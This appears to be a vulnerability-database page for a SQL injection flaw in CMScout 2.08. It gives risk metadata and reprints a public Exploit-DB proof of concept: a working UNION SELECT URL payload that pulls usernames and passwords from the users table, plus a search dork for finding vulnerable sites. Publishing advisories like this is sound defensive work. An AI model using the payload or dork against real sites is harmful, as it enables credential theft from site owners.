VIR Vulnerability Intelligence Relay

CVE-2010-5059

high
Published 2011-11-23 ยท Modified 2026-04-29
๐Ÿ’ฌ Discuss on Community โœš Propose mitigation
CVSS v3
โ€”
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
8.5

Description

SQL injection vulnerability in index.php in CMScout 2.0.8 allows remote attackers to execute arbitrary SQL commands via the album parameter in a photos action.

Predictions

Exploit likelihood
20%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-12407 webapps php verified text ยท 2 KB
Dr.0rYX & Cr3W-DZ ยท 2010-04-26

CMScout 2.08 - SQL Injection

text exploit Source: Exploit-DB 
# Title: CMScout 2.08 SQL Injection Vulnerability
# EDB-ID: 
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Dr.0rYX and Cr3w-DZ
# Published: 
# Verified: 
# Download Exploit Code
# Download N/A

  NNNN      NNNN        AAAAAA          SSSSSSSS      TTTTTTTTTTTT                                                
  NNNNNN    NNNN        AAAAAA        SSSSSSSSSSSS    TTTTTTTTTTTT                                                
  NNNNNN    NNNN      AAAA  AAAA      SSSS                TTTT          eeeeee        aaaaaa      mmmm  mm  mmmm  
  NNNNNNNN  NNNN      AAAA  AAAA      SSSSSSSSSS          TTTT        eeee  eeee    aaaa  aaaa    mmmmmmmmmmmmmmmm
  NNNN  NNNNNNNN    AAAA      AAAA        SSSSSSSS        TTTT        eeeeeeeeee        aaaaaa    mmmm  mmmm  mmmm
  NNNN    NNNNNN    AAAAAAAAAAAAAA            SSSS        TTTT        eeee          aaaa  aaaa    mmmm  mmmm  mmmm
  NNNN    NNNNNN    AAAAAAAAAAAAAA    SSSSSSSSSSSS        TTTT        eeeeeeeeee    aaaa  aaaa    mmmm  mmmm  mmmm
  NNNN      NNNN  AAAA          AAAA    SSSSSSSS          TTTT          eeeeee      aaaaaaaaaa    mmmm  mmmm  mmmm




                                ALGERIAN HACKER
  **********************- NORTH-AFRICA SECURITY TEAM -***********************
 
[!] Title     :  CMScout 2.08 SQL Injection Vulnerability
[!] Author    : Dr.0rYX and Cr3w-DZ
[!] MAIL      : vx3@hotmail.de  &  Cr3w@hotmail.de
 
***************************************************************************/
 
[ Software Information ]
 
[+] Vendor   : http://www.cmscout.za.net/
[+] script   : CMScout 2.08
[+] Download : http://www.cmscout.co.za/index.php?page=downloads&menuid=9
[+] Vulnerability : php SQL injection
[+] Dork :Powered by CMScout (c)2005 CMScout Group

 
**************************************************************************/
[ Vulnerable File ]
 
http://server/index.php?page=photos&album=[N.A.S.T ]
 
[ Exploit ]
 
http://server/index.php?page=photos&album=-1+UNION+ALL+SELECT+1,concat(uname,0x3a,passwd),3,4,5+from+sn_users--
 
 
 
[ Example  ]
 
http://[site]/index.php?page=photos&album=-1+UNION+ALL+SELECT+1,concat%28uname,0x3a,passwd%29,3,4,5+from+sn_users--
 
[  Greets ]
 
[+] :CLAW , exploit-db.com,all my friends....

Application impact
VendorProductVersionsFixed
cmscoutcmscout2.08

References

CWEs

CWE-89

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.